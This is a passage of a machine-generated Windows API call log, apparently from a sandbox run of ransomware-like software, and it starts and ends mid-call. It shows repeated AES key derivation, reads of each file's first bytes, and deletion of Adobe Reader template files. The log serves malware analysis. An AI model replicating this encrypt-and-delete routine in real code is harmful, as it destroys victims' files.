pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.219] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0197.219] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x434e [0197.219] ReadFile (in: hFile=0x588, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0197.223] CryptDestroyHash (hHash=0x284d628) returned 1 [0197.223] CryptDestroyKey (hKey=0x284d568) returned 1 [0197.223] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0197.224] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lueminut.htm")) returned 1 [0197.226] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0197.250] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0197.440] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0197.514] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0197.548] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0197.549] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0197.549] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0197.549] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.549] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0197.550] GetFileSize (in: hFile=0x5dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11ff6 [0197.550] ReadFile (in: hFile=0x5dc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0197.561] CryptDestroyHash (hHash=0x284d668) returned 1 [0197.561] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0197.561] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0197.562] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\adobeid.pdf")) returned 1 [0197.667] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0197.667] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0197.668] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.668] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0197.668] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11581 [0197.668] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0197.674] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0197.674] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0197.674] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0197.675] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\defaultid.pdf")) returned 1 [0197.677] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0197.678] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0197.679] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0197.679] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.679] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0197.679] GetFileSize (in: hFile=0x5dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x20cc1 [0197.679] ReadFile (in: hFile=0x5dc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0197.697] CryptDestroyHash (hHash=0x284d668) returned 1 [0197.697] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0197.697] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0197.698] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\chs\\adobeid.pdf")) returned 1 [0197.742] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0197.743] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0197.743] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.743] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0197.743] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x207b0 [0197.743] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0197.770] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0197.770] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0197.770] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0197.773] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\chs\\defaultid.pdf")) returned 1 [0197.776] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0197.776] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0197.777] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0197.777] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.777] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0197.777] GetFileSize (in: hFile=0x5dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x561b [0197.777] ReadFile (in: hFile=0x5dc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0197.795] CryptDestroyHash (hHash=0x284d668) returned 1 [0197.795] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0197.795] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0197.796] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cht\\adobeid.pdf")) returned 1 [0197.812] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0197.813] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0197.813] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.813] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0197.813] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x510a [0197.813] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0197.824] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0197.824] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0197.824] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0197.825] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cht\\defaultid.pdf")) returned 1 [0197.907] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0197.921] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0197.922] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0197.922] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.922] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0197.922] GetFileSize (in: hFile=0x5dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x16057 [0197.922] ReadFile (in: hFile=0x5dc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0197.945] CryptDestroyHash (hHash=0x284d668) returned 1 [0197.945] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0197.946] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0197.947] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cze\\adobeid.pdf")) returned 1 [0198.166] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0198.167] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0198.167] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0198.167] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0198.167] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x155af [0198.167] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0198.291] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0198.291] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0198.291] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0198.292] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cze\\defaultid.pdf")) returned 1 [0198.404] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0198.405] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0198.405] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0198.405] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0198.405] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0198.405] GetFileSize (in: hFile=0x5dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x106ec [0198.405] ReadFile (in: hFile=0x5dc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0198.519] CryptDestroyHash (hHash=0x284d668) returned 1 [0198.519] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0198.519] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0198.520] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\dan\\adobeid.pdf")) returned 1 [0198.628] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0198.628] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0198.628] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0198.628] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0198.629] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x101ce [0198.629] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0198.635] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0198.635] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0198.635] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0198.636] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\dan\\defaultid.pdf")) returned 1 [0198.659] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0198.659] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0198.660] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0198.660] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0198.660] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0198.660] GetFileSize (in: hFile=0x5dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x106d4 [0198.660] ReadFile (in: hFile=0x5dc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0198.714] CryptDestroyHash (hHash=0x284d668) returned 1 [0198.714] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0198.714] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0198.715] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\deu\\adobeid.pdf")) returned 1 [0198.912] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0198.912] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0198.912] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0198.912] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0198.912] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x101bc [0198.912] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0198.919] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0198.919] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0198.919] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0198.920] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\deu\\defaultid.pdf")) returned 1 [0198.923] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0198.924] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0198.924] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0198.924] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0198.924] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0198.924] GetFileSize (in: hFile=0x5f0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x14096 [0198.924] ReadFile (in: hFile=0x5f0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0198.939] CryptDestroyHash (hHash=0x284d668) returned 1 [0198.939] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0198.939] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0198.940] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\enu\\adobeid.pdf")) returned 1 [0199.176] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0199.177] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0199.177] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.177] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0199.177] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b0b [0199.177] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0199.196] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0199.196] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0199.197] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0199.198] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\enu\\defaultid.pdf")) returned 1 [0199.200] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0199.201] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0199.201] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0199.201] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.201] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0199.201] GetFileSize (in: hFile=0x5f0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x109db [0199.201] ReadFile (in: hFile=0x5f0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0199.207] CryptDestroyHash (hHash=0x284d668) returned 1 [0199.207] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0199.207] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0199.208] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\esp\\adobeid.pdf")) returned 1 [0199.435] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0199.435] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0199.436] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.436] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0199.436] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x104bf [0199.436] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0199.441] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0199.441] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0199.441] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0199.443] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\esp\\defaultid.pdf")) returned 1 [0199.444] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0199.446] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0199.447] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0199.447] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0199.447] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.447] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0199.447] GetFileSize (in: hFile=0x5f0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10ab0 [0199.447] ReadFile (in: hFile=0x5f0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0199.453] CryptDestroyHash (hHash=0x284d668) returned 1 [0199.453] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0199.453] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0199.454] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\fra\\adobeid.pdf")) returned 1 [0199.561] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0199.561] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: 